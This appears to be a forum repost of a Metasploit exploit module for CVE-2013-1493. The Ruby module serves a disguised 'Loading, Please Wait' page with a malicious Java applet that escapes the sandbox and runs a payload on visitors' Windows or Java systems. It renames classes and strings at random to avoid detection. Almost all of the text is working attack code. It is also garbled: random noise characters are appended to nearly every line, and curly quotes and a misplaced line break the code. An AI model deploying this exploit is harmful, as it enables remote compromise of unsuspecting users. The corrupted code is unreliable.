##
9 X" P u; P, O: \+ r7 G4 g) w4 L. F) {2 K& w5 N
# This file is part of the Metasploit Framework and may be subject to x/ C* F8 `( p6 ^% j
# redistribution and commercial restrictions. Please see the Metasploit- Q; d2 h, r* @/ i3 H
# web site for more information on licensing and terms of use.. C1 g1 q3 r& W1 _6 u
# http://metasploit.com// \% [- F1 \0 n9 {7 V8 d4 _
### M9 E0 @+ U: s0 X) M& i' I* D
require ‘msf/core’4 h) Y' O0 v+ S" U& I8 j: R
require ‘rex’
; u3 H o: d6 d* d* fclass Metasploit3 < Msf::Exploit::Remote6 d1 \3 U2 }. i
Rank = NormalRanking
1 o. S& _; f; H4 M8 }$ y. L/ Uinclude Msf::Exploit::Remote::HttpServer::HTML
1 w0 @6 z" }- F/ ]; ?. yinclude Msf::Exploit::EXE
: n1 f' q# h3 Q/ m7 K0 o5 `include Msf::Exploit::Remote::BrowserAutopwn
6 q) N2 w' Z7 x$ Z. H( a: m& Nautopwn_info({ :javascript => false })0 X4 ^% I, v# z$ Q
def initialize( info = {} ) U( G, o. _" x: f/ X: m" \
super( update_info( info,9 K6 u& {& V6 `7 D+ L, Z3 Y
‘Name’ => ‘Java CMM Remote Code Execution’,: \8 n$ M& y1 |4 W1 _
‘Description’ => %q{3 v- q; s- J: b/ e; U
This module abuses the Color Management classes from a Java Applet to run
0 t7 y+ Y' T1 w, \4 ]$ Narbitrary Java code outside of the sandbox as exploited in the wild in February' P6 w6 u, N% b
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
/ U6 Q: B" Y, g, T: E% S% |and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1$ H: N6 \) W1 R* C7 Q
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java m; N1 v7 K" I, p8 V
warning in order to run the malicious applet.9 S0 y" v. o' S- s: P4 e# J8 T5 _
},' O! j7 H: ]* k) l
‘License’ => MSF_LICENSE,! `! K1 b; I) s
‘Author’ =>
1 B& @* i9 X# v'Unknown', # Vulnerability discovery and Exploit
* ] w6 [, D, Z& x( E$ @# z'juan vazquez' # Metasploit module (just ported the published exploit)& s j& R6 F4 d+ S& S4 H" l0 g
],
0 y7 _8 p2 y2 a* R% |' I& a‘References’ =>
( {3 A0 E. ?5 S- Z: a3 J7 }0 t[+ L. S( x, X" @" C6 W
[ 'CVE', '2013-1493' ],
1 g2 n* ^1 @* e" x$ V; R8 x7 q[ 'OSVDB', '90737' ],7 }- O j$ H$ J
[ 'BID', '58238' ], x- L& }/ A$ y0 r
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
0 a! y4 u( ^1 L" l: a[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],* T; ]; z* \' }" `% o1 A# N$ @& M- F
[ 'URL', 'http://pastie.org/pastes/6581034' ]
; W& A O+ @) \0 p+ n1 ]7 y4 }],
`( `0 V6 p a. ^, a- o‘Platform’ => [ 'win', 'java' ],6 `4 x4 T$ c% y( R: c& c1 `3 a
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },$ H: U% ~1 }3 _5 w. Z% Q
‘Targets’ =>
3 F, ]7 I* T& d" Y; z[) ]$ [, p' C' H, Z8 T# Y
[ 'Generic (Java Payload)',2 X. E8 V1 T O& X/ d! e" S9 v( {
{
6 m1 ^' d' a) S'Platform' => 'java',( K9 ]! H/ F1 H: l$ N+ n
'Arch' => ARCH_JAVA" x2 ~/ V% @( c9 a7 a4 b$ B
}# j/ }2 w" X9 z; L- P
],
3 a" o, V* A" z/ h1 }: K[ 'Windows x86 (Native Payload)',4 D; _3 k A2 s& R8 t
{
5 g+ k% u" I% M'Platform' => 'win',
3 A7 \' A4 A X0 q d+ W$ D4 H'Arch' => ARCH_X868 l D; L |6 `' k
}+ E, U U3 O1 o# Q: A
]
$ M$ z) \. Z9 Q- B1 h9 z],5 e4 B) c5 f# Y1 T& s( f. U
‘‘DisclosureDate’ => ‘Mar 01 2013′- r9 O4 e0 D6 f3 C% Z
))
+ h. E1 f: {1 lend& F: l- o& T% w% G9 R
def setup
6 D3 [' \+ P; S4 d. i; Fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
% ?; ?0 a" B u5 p' a@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }$ n% y' N; ? n. M5 Z5 r9 k% }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)- E2 L8 K6 C% y' D
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }9 o: m4 a: n$ i$ C
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
9 ?, d) A& i+ H3 |8 K: ^@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
+ S, l; L+ g1 K& e0 `; ~1 Qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
0 S: a( J; ^" v' W+ K@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ c: R, e& e" D
@init_class_name = rand_text_alpha(“Init”.length) R( p3 u4 V; K6 S4 |. Y7 A
@init_class.gsub!(“Init”, @init_class_name)
/ j9 T; c3 H& Esuper
, ?( V" V8 Q+ ?' A# f+ D: T/ ?8 |! wend+ g; b" X% F7 `, D( q A
def on_request_uri(cli, request)+ v M9 k# E. b, G7 r c! Q1 O$ |) a
print_status(“handling request for #{request.uri}”). |8 S) f! z- p- N+ T/ b! O" ?
case request.uri: u4 v, t; [4 V ^
when /\.jar$/i
$ o$ G9 I! x* _5 `) O1 y3 [/ u/ Tjar = payload.encoded_jar
: \; k, q5 s% }" V, `$ Q$ j1 }6 ]% m. ~jar.add_file(“#{@init_class_name}.class”, @init_class)# U, l" ]! `* U- A" q4 W0 }* c
jar.add_file(“Leak.class”, @leak_class). H, S5 b# W' b" @# t- K
jar.add_file(“MyBufferedImage.class”, @buffered_image_class) R0 r) x! {0 w4 U
jar.add_file(“MyColorSpace.class”, @color_space_class)' L3 D6 E# y7 S. u/ e
DefaultTarget’ => 1,
# F7 B( m7 g! x6 L. Rmetasploit_str = rand_text_alpha(“metasploit”.length)0 s/ q+ G0 w/ n: v
payload_str = rand_text_alpha(“payload”.length)0 b; l6 X/ |, p" o/ s" U
jar.entries.each { |entry|" {0 l6 z. D @+ ~& m4 G7 U
entry.name.gsub!(“metasploit”, metasploit_str)) K) b! U; [. v0 \- ]8 t
entry.name.gsub!(“Payload”, payload_str)
, F4 o; H4 f% Y: `: eentry.data = entry.data.gsub(“metasploit”, metasploit_str)
* g% P5 h1 Q1 D% g! C4 U0 kentry.data = entry.data.gsub(“Payload”, payload_str)
0 }5 P+ Y' }7 w( W X}
- Y8 s U2 ~; Vjar.build_manifest1 l5 E- G# P0 ^+ [% l
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })# Z+ c. w1 L( S8 S* B9 N$ G
when /\/$/
, J* H% A: y" z( F; Zpayload = regenerate_payload(cli)1 n ~6 N: O* f5 c. X6 V
if not payload
4 I# d6 P6 b+ _* s5 J; wprint_error(“Failed to generate the payload.”)
5 x( ]/ n6 \9 x8 s" y! z% Usend_not_found(cli)
0 }1 F3 \, _' B- ^: xreturn
' r# E- W) y$ \- g2 D0 Nend% u* u. U8 I( L- E. V/ _9 C
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })" j4 Y* k1 P1 M, b& u
else
+ ?" J% H. h4 _ \8 Msend_redirect(cli, get_resource() + ‘/’, ”)% Z' [! A. R: U* [& o0 v6 \
end6 t+ l' K8 I; o; {! S) M
end# J; D/ B" R* a6 ?
def generate_html- s8 W, P1 k8 a. u7 F
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
) S3 M; e$ n# |3 p5 l) k2 p* Hhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|5 A; i% I4 k% _/ E
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
0 F4 R. N" p7 G, Z/ b$ Z0 X, Ihtml += %Q|</applet></body></html>|
H8 Q# N7 ~ _# X, s- L- ureturn html2 r5 k4 d' m$ b: _+ {& ~
end/ v! ~4 u' M( ^) h2 k, `: }
end
8 u8 L0 V8 ~& Wend
# R; X$ g' Y ]0 e, x$ V |
发表于 2013-4-4 17:31:17
收藏
支持
反对